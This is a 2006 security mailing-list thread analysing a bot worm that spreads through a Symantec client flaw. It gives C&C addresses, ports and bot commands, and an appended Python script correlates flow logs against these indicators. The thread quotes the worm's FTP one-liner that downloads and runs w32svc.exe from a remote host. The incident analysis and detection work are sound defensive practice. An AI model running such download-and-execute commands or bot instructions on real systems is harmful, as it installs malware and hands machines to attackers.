[unisog] Worm exploiting Symantec client defect?????

Brian Eckman eckman at umn.edu
Mon Nov 27 23:41:24 GMT 2006


We might have a slightly different variant, because I've seen some
differences in activity related to this. I'll send out a slightly edited
version of what I sent out here to internal staff in just a few...

Cam Beasley wrote:
> - a reptile bot it seems

Yup.

> - uses VMware and debugger detection
> - IRC Based C&C with a modified version of UnrealIRCD
> - Ops go by god and G00D
> - the botnet controller was at 38.118.143.201:6667
>   but just recently jumped to 64.143.184.7:6667

The C&C is www.flackware.info:6667/tcp. Those IP addresses were what
that RR resolved to at given points in time.

> - initial attack vectors target tcp/2967 & tcp/6236

2967/tcp I can confirm. 6236/tcp is involved, but a packet capture
showed an infected host running a cmd.exe shell on that port, so I think
that this isn't "attacking" folks via that port, per se.

> - compromised hosts participate in a NetBIOS & VNC scan of
>   local networks

I haven't seen this activity. I suspect the ones that were seen doing
this were told to do so by the C&C, and that our infections took place
at a time when the C&C was giving different instructions.

> - common bot commands are:
>   .asc -S -s
>   .asc mass445 100 5 0 -b -r -e -h
>   .asc rtvscan 100 5 0
> - malcode is transferred thusly:
>   echo open X.X.X.X 2100  >  i&echo user 1 1  >  >  i
>   &echo get w32svc.exe  >  >  i &echo quit  >  >  i &ftp
>   -As:i &w32svc.exe &exit
> - w32svc.exe is dumped to C:\Program Files\Symantec AntiVirus

w32svc.exe may have been dumped there (the cmd.exe shell bound to
6236/tcp that I saw had C:\Program Files\Symantec AntiVirus as the
working directory), but I've been seeing it installed to %WINDIR%. It is
then removed from the initial location.

> - Symantec wasn't identifying the malcode 'w32svc.exe' the
>   last time I checked..

The Rapid Release defs released before this post do detect it and do a
wonderful job of removal. The defs are 11/27/2006 rev.50.

Thanks for pointing this out, Cam!

Brian
-- 
Brian Eckman, Security Analyst
University of Minnesota
Office of Information Technology
Security & Assurance
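As an added illustration (not part of Brian's or Cam's posts), the indicators in this thread can be turned into a simple flow-log correlation for spotting hosts that were probed on 2967/tcp or reached on the 6236/tcp shell port and then talked to the IRC C&C addresses; the flow records and the log format are constructed, and the C&C addresses are the two named above.

```python
from collections import defaultdict

# Constructed sample flow records (not from the original post):
# timestamp src dst dport proto
SAMPLE_FLOWS = """\
2006-11-27T22:01:10 10.1.2.3 10.1.2.77 2967 tcp
2006-11-27T22:01:14 10.1.2.77 64.143.184.7 6667 tcp
2006-11-27T22:02:00 10.1.2.5 10.1.2.77 6236 tcp
2006-11-27T22:03:30 10.1.2.9 10.1.2.10 80 tcp
2006-11-27T22:04:00 10.1.2.10 38.118.143.201 6667 tcp
"""

# Indicators taken from the thread above.
SCAN_PORT = 2967    # Symantec client port used as the initial attack vector
SHELL_PORT = 6236   # port the bot's cmd.exe shell was observed listening on
CC_PORT = 6667      # IRC C&C port
CC_IPS = {"38.118.143.201", "64.143.184.7"}  # what www.flackware.info resolved to


def parse_flows(text):
    """Parse the constructed whitespace-separated flow format."""
    flows = []
    for line in text.splitlines():
        ts, src, dst, dport, proto = line.split()
        flows.append((ts, src, dst, int(dport), proto))
    return flows


def classify(flows):
    """Return {host: set(reasons)} for hosts matching any thread indicator."""
    hits = defaultdict(set)
    for ts, src, dst, dport, proto in flows:
        if proto != "tcp":
            continue
        if dport == SCAN_PORT:
            hits[dst].add("targeted_on_2967")   # inbound probe of the client port
        if dport == SHELL_PORT:
            hits[dst].add("shell_port_6236")    # something reached the bound shell
        if dport == CC_PORT and dst in CC_IPS:
            hits[src].add("cc_irc_6667")        # outbound to a known C&C address
    return dict(hits)


def likely_infected(flows):
    """Hosts that were probed/shelled AND contacted the C&C: the strongest signal."""
    hits = classify(flows)
    return sorted(h for h, r in hits.items()
                  if "cc_irc_6667" in r
                  and r & {"targeted_on_2967", "shell_port_6236"})
```

A host seen only on 6667/tcp to one of the addresses (10.1.2.10 in the sample) is worth a look but is reported separately, since the C&C record's IP changes over time and an IRC connection alone is weaker evidence.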
